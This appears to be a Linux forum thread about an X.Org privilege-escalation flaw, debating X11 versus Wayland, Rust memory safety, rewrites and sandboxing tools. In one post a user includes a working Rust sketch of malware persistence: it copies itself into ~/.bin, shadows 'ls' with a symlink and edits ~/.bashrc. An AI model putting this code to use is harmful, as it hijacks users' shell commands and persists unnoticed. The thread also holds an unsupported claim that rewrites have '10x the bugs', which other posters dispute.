X.Org Server Hit By New Local Privilege Escalation Vulnerability

  • #51
    Originally posted by scottishduck View Post
    Do you want the working protocol that’s riddled with vulnerabilities, or the protocol that’s been in development for 14 years and still doesn’t work? Make your choice.
    Easy. I'll go with the vulnerabilities on my personal computer. No other users. I care more about basic features. Sure, malware could escalate to root permissions, but I care more about my /home than about /usr/bin anyway. If malware gets on my system, it already has access to my most important files. Sure, root access would mean malware could become persistent across reboots, and that is not a good thing. But one can fight malware on different levels (firewalls, antivirus software, browser blocklists), while on the other hand, limiting your feature set is literally limiting.



    • #52
      Originally posted by ryao View Post
      Rust is not 100% immune to memory issues, since it needs unsafe Rust to work in many cases and unsafe Rust is well known to suffer from memory issues. For example:

      Developed at the Georgia Institute of Technology, Rudra is a static analyzer able to report potential memory safety bugs in Rust programs. Rudra has been used to scan the entire Rust package registry and identified 264 new memory safety bugs.
      Of course not, but it makes memory-related issues incredibly easy to pin down, as unsafe code is the only culprit that needs to be fixed.
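      To make that concrete, here is a minimal Rust sketch (my illustration, not taken from the Rudra paper). The only place this program can go wrong is its single `unsafe` block, which is exactly where an auditor would look first:

      ```rust
      // A use-after-scope read that only `unsafe` permits. Safe Rust
      // rejects the reference version of this at compile time
      // (error[E0597]: `x` does not live long enough).
      fn main() {
          let dangling: *const i32;
          {
              let x = 42;
              dangling = &x as *const i32; // raw pointer outlives `x`
          }
          // Dereferencing a raw pointer compiles, but here it is
          // undefined behavior, and it can only appear in `unsafe`:
          let v = unsafe { *dangling };
          println!("{v}");
      }
      ```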

      Also, the research reports bugs found across all crates downloaded from crates.io, not in one single crate.

      Originally posted by ryao View Post
      For completeness, I should add that compiler bugs can also result in memory safety issues.
      Yes, but so far that has been rare in Rust.

      Originally posted by ryao View Post
      However, even if there really were no memory safety issues, other classes of bugs would occur in enough abundance to make replacements more buggy than the original software. Let us say that a rewrite from scratch will have 10x the bugs (which is likely a conservative estimate). Then even if you eliminate 70% via memory safety, you still have 3x the bugs. This is why you have various industry leaders that encourage Rust adoption suggesting that Rust be used only for new projects rather than calling for complete rewrites in Rust.
      Excuse me, but do you have anything backing up what you say?
      Where does a number like 10x come from?

      What is the project we are talking about?
      How do they plan the rewrite?

      Without details, you could be comparing apples to oranges.

      There are a lot of examples out there where a rewrite actually brings benefits, like Google rewriting their own low-level Android drivers, or Cloudflare rewriting their nginx + Lua solution in async Rust.



      • #53
        Originally posted by evert_mouw View Post
        Easy. I'll go with the vulnerabilities on my personal computer. No other users. I care more about basic features. Sure, malware could escalate to root permissions, but I care more about my /home than about /usr/bin anyway. If malware gets on my system, it already has access to my most important files. Sure, root access would mean malware could become persistent across reboots, and that is not a good thing.
        Malware doesn't even need root to persist.

        It can simply install itself into $HOME/.bin and add some code to your .profile/.bashrc/.bash_profile, and then it will start the next time you use your shell.

        It can also add symlinks to itself in $HOME/.bin: e.g. if it symlinks $HOME/.bin/ls to itself, and $HOME/.bin is in your $PATH before /usr/bin (which is usually the case), the next time you run ls it will actually run the malware.
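        To make the mechanism concrete, here is a hypothetical Rust sketch of that trick (illustration only: the `payload` name is made up, and nothing beyond the copy/symlink/PATH edit itself is included):

        ```rust
        // Hypothetical persistence sketch: drop a copy in ~/.bin, shadow
        // `ls` with a symlink, and prepend ~/.bin to $PATH via ~/.bashrc.
        use std::{env, fs, io::Write, os::unix::fs::symlink, path::PathBuf};

        fn main() -> std::io::Result<()> {
            let home = PathBuf::from(env::var("HOME").expect("HOME not set"));
            let bin = home.join(".bin");
            fs::create_dir_all(&bin)?;

            // 1. Copy the running executable into ~/.bin as the "payload".
            let payload = bin.join("payload");
            fs::copy(env::current_exe()?, &payload)?;

            // 2. Shadow a common command: ~/.bin/ls -> ~/.bin/payload. If
            //    ~/.bin precedes /usr/bin in $PATH, `ls` runs the payload.
            let _ = symlink(&payload, bin.join("ls"));

            // 3. Persist across shells by prepending ~/.bin to $PATH.
            let mut rc = fs::OpenOptions::new()
                .create(true)
                .append(true)
                .open(home.join(".bashrc"))?;
            writeln!(rc, "export PATH=\"$HOME/.bin:$PATH\"")?;
            Ok(())
        }
        ```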

        Even if the X server is not run with root permissions, it's still possible for malware to run as root, given that a lot of people enable passwordless sudo.
        All it takes is one "sudo ..." and your computer is 100% compromised.

        Originally posted by evert_mouw View Post
        But one can fight malware on different levels (firewalls, antivirus software, browser blocklists), while on the other hand, limiting your feature set is literally limiting.
        Firewalls generally don't help much in blocking malware, unless you are running a server and use them to prevent attackers from brute-forcing your ssh password/key or trying to trigger CVEs in your network stack, or to prevent DDoS, which is probably their most important use case.

        I'm not aware of any good antivirus software on Linux.

        As for blocklists, unless you use a whitelist, they're only effective against known bad actors.

        For a start, you can use Firejail, which uses Linux namespaces to sandbox applications.

        If you don't mind some performance penalty, you can go for gVisor or Firecracker, which use a small VMM to reduce the attack surface by emulating Linux syscalls themselves instead of passing them to Linux directly.
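        For context, the primitive Firejail builds on is unshare(2). A minimal sketch in Rust (assuming Linux and the `libc` crate; Firejail layers bind mounts, seccomp filters, etc. on top of this):

        ```rust
        // Move this process into fresh user + mount namespaces, which is
        // allowed unprivileged on most modern kernels.
        fn main() {
            let flags = libc::CLONE_NEWUSER | libc::CLONE_NEWNS;
            if unsafe { libc::unshare(flags) } != 0 {
                eprintln!("unshare failed: {}", std::io::Error::last_os_error());
                std::process::exit(1);
            }
            // From here the process has its own mount table, so a sandbox
            // can remount /home read-only, hide paths, and so on.
            println!("running in fresh user + mount namespaces");
        }
        ```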



        • #54
          Originally posted by NobodyXu View Post

          Excuse me, but do you have anything backing up what you say?
          Where does a number like 10x come from?
          Actual experience. If you post a question to Stack Overflow asking for references for what I posted, you will likely get a number of them. Much of what I have written can be backed up by statistics (and I have seen data showing it in the past). It is unfortunate that I do not have links to that data to give you, but the guys at Stack Overflow should have them.
          Last edited by ryao; 07 February 2023, 08:27 AM.



          • #55
            Originally posted by NobodyXu View Post
            Malware doesn't even need root to persist. [...]
            True, I forgot to mention it.


            Originally posted by NobodyXu View Post
            Firewalls generally don't help much in blocking malware [...] you can go for gVisor or Firecracker [...]
            Using sshguard by default, and ext4 encryption for $HOME. Daily backups to an OmniOS (Solaris-derived) system with ZFS snapshots. I try to keep backups on slightly different OSes so that not all of my boxes have the same vulnerabilities.

            In my experience, most malware comes through the browser. I'll review your suggestions; thanks!



            • #56
              Originally posted by ryao View Post

              Actual experience. If you post a question to Stack Overflow asking for references for what I posted, you will likely get a number of them. Much of what I have written can be backed up by statistics. It is unfortunate that I do not have links to that data to give you, but the guys at Stack Overflow should have them.
              My experience with programming is that while a rewrite is hard, a well-done rewrite often simplifies the code and surfaces bugs in the old implementation, provided you have a test suite.

              That happens in the Linux kernel all the time, and it often involves changing the API. Is there any proof that the old Linux kernel had significantly fewer bugs than the new one due to these rewrites?

              An example is that there were many CVEs in the 4.x series due to Linux namespaces being a new feature, and they were messed up to the point of not being suitable for secure sandboxing.
              Then along came wasm, which is an interpreter with capability-based syscalls (the wasm component model), meaning everything is sandboxed by default and you cannot open anything unless you have the capability.

              It is so much more secure than Linux namespaces that many cloud providers have adopted it, and it can actually run multiple wasm instances from different clients without using virtual machines.

              While it's not exactly a rewrite, they are similar technologies with overlapping use cases. Wasm was invented after Linux namespaces and Docker and is strictly more complex than Linux namespaces, yet they got it right where the Linux kernel failed.
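              The capability model described above can be sketched in plain Rust (a toy illustration of the idea; `DirCapability` is made up, not the actual wasm component model API). Guest code receives explicit handles instead of ambient filesystem access:

              ```rust
              use std::fs;
              use std::path::{Path, PathBuf};

              /// Toy capability: an unforgeable handle to one directory subtree.
              struct DirCapability {
                  root: PathBuf,
              }

              impl DirCapability {
                  /// Only the host (with ambient authority) mints capabilities.
                  fn preopen(root: impl AsRef<Path>) -> std::io::Result<Self> {
                      Ok(Self { root: fs::canonicalize(root)? })
                  }

                  /// Reads resolve against the granted root; escapes are refused.
                  fn read(&self, rel: &str) -> std::io::Result<Vec<u8>> {
                      let full = fs::canonicalize(self.root.join(rel))?;
                      if !full.starts_with(&self.root) {
                          return Err(std::io::Error::new(
                              std::io::ErrorKind::PermissionDenied,
                              "path escapes the granted capability",
                          ));
                      }
                      fs::read(full)
                  }
              }

              // "Guest" code can only touch what it was explicitly handed.
              fn guest(cap: &DirCapability) {
                  let _ = cap.read("data.txt"); // allowed: inside the subtree
                  assert!(cap.read("../../../etc/passwd").is_err()); // refused
              }

              fn main() -> std::io::Result<()> {
                  let cap = DirCapability::preopen(".")?;
                  guest(&cap);
                  Ok(())
              }
              ```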

              And statistics are only meaningful with context and details; otherwise they could just be made up of all the failed rewrite attempts.



              • #57
                Originally posted by evert_mouw View Post
                Using sshguard by default, and ext4 encryption for $HOME. Daily backups to an OmniOS (Solaris-derived) system with ZFS snapshots. I try to keep backups on slightly different OSes so that not all of my boxes have the same vulnerabilities.
                I think the best way to prevent malware is to cut the internet connection,
                so you keep the ZFS backup system entirely offline and only connect/turn it on when needed.
                Also, since most malware now comes through the browser, as you mentioned, it's already significantly more secure without a web browser.

                Originally posted by evert_mouw View Post
                In my experience, most malware comes through the browser. I'll review your suggestions; thanks!
                You could also use Qubes OS https://www.qubes-os.org/ which is probably as secure as you can get, since it runs each application in its own Xen VM.
                It also runs the network stack, storage stack, and Bluetooth each in their own VM, so I believe it's the most secure option, unless you use a dedicated computer for web browsing and another for other activities.



                • #58
                  This thread delivers like a meth addict working for Uber Eats.



                  • #59
                    Originally posted by ryao View Post
                    Actual experience. If you post a question to Stack Overflow asking for references for what I posted, you will likely get a number of them. Much of what I have written can be backed up by statistics (and I have seen data showing it in the past). It is unfortunate that I do not have links to that data to give you, but the guys at Stack Overflow should have them.
                    Well, if you post a question to Stack Overflow about rewrites that went well, then you'll also get many examples. That proves nothing.
                    Likewise, the actual experience of a single developer proves nothing. I've seen some code rewrites that had more bugs and some that had fewer. I've also seen some projects with unfixable design bugs where a complete rewrite was the only way to move forward.



                    • #60
                      Originally posted by ryao View Post

                      Rust is not 100% immune to memory issues, since it needs unsafe Rust to work in many cases and unsafe Rust is well known to suffer from memory issues. For example:
                      I never said it's immune; you are twisting my words. I said that for the areas of code where Rust's linear type checker (which checks memory management) is used, that part of the code specifically is verified not to have memory leaks (and such code is obviously not unsafe).

                      This kind of reasoning is fallacious anyway. Even though unsafe needs to be used in a few areas, everywhere else you do not have to worry about these problems, which by definition massively reduces the scope for security issues. That is much better than the status quo in C/C++.

                      Originally posted by ryao View Post
                      For completeness, I should add that compiler bugs can also result in memory safety issues.
                      Yes they can; even CPUs can have bugs at the silicon level. In practice you are unlikely to hit that kind of problem in a stable Rust release. What you will hit quite frequently in practice is use-after-free errors in programs written in C (like the one this thread is about).

                      Originally posted by ryao View Post
                      However, even if there really were no memory safety issues, other classes of bugs would occur in enough abundance to make replacements more buggy than the original software. Let us say that a rewrite from scratch will have 10x the bugs (which is likely a conservative estimate). Then even if you eliminate 70% via memory safety, you still have 3x the bugs. This is why you have various industry leaders that encourage Rust adoption suggesting that Rust be used only for new projects rather than calling for complete rewrites in Rust.
                      For starters, this is all based on assumptions. You can only claim these things scientifically if you have a control, which in this case would mean keeping the language the same, and in our case we are not arguing that. While it is true that recoding things has the potential to introduce new logic bugs (although Rust can even check against some of those, specifically concurrent logic bugs), arguing about what the ratios are is pure speculation.

                      What we do know is that rewriting existing C/C++ software in Rust is providing tangible benefits, especially when it comes to security. It's also bringing performance improvements, not because Rust is intrinsically faster (although there is some untapped future potential for Rust to be faster here) but because Rust provides fearless concurrency. Because it is so easy to shoot yourself in the foot, a lot of C programs were written either in a single-threaded manner or with very trivial, low-hanging-fruit concurrency (i.e. at the process level, which brings multiplexing overhead). Since Rust checks these issues statically, programs can be rewritten from scratch with concurrency in mind, without the decades of debugging concurrency problems (which also differ between architectures, making things worse; e.g. ARM's memory semantics are weaker than x86's).
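                      As a sketch of what fearless concurrency means in practice (my illustration, not from the post): the unsynchronized version below is a compile error, so the fix has to be written down explicitly.

                      ```rust
                      use std::sync::atomic::{AtomicU64, Ordering};
                      use std::thread;

                      fn main() {
                          // The racy version does not compile:
                          //     let mut n = 0u64;
                          //     thread::scope(|s| {
                          //         s.spawn(|| n += 1); // error[E0499]: cannot borrow
                          //         s.spawn(|| n += 1); //   `n` as mutable more than once
                          //     });
                          // The compiler forces the race to be resolved explicitly:
                          let n = AtomicU64::new(0);
                          thread::scope(|s| {
                              for _ in 0..4 {
                                  s.spawn(|| {
                                      n.fetch_add(1, Ordering::Relaxed);
                                  });
                              }
                          });
                          assert_eq!(n.load(Ordering::Relaxed), 4);
                      }
                      ```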

                      Originally posted by Sevard View Post
                      Well, if you post a question to Stack Overflow about rewrites that went well, then you'll also get many examples. That proves nothing.
                      Likewise, the actual experience of a single developer proves nothing. I've seen some code rewrites that had more bugs and some that had fewer. I've also seen some projects with unfixable design bugs where a complete rewrite was the only way to move forward.
                      Yeah, using Stack Overflow to answer the question "do rewrites produce more bugs" is inaccurate to the level of a facepalm.
                      Last edited by mdedetrich; 07 February 2023, 09:42 AM.

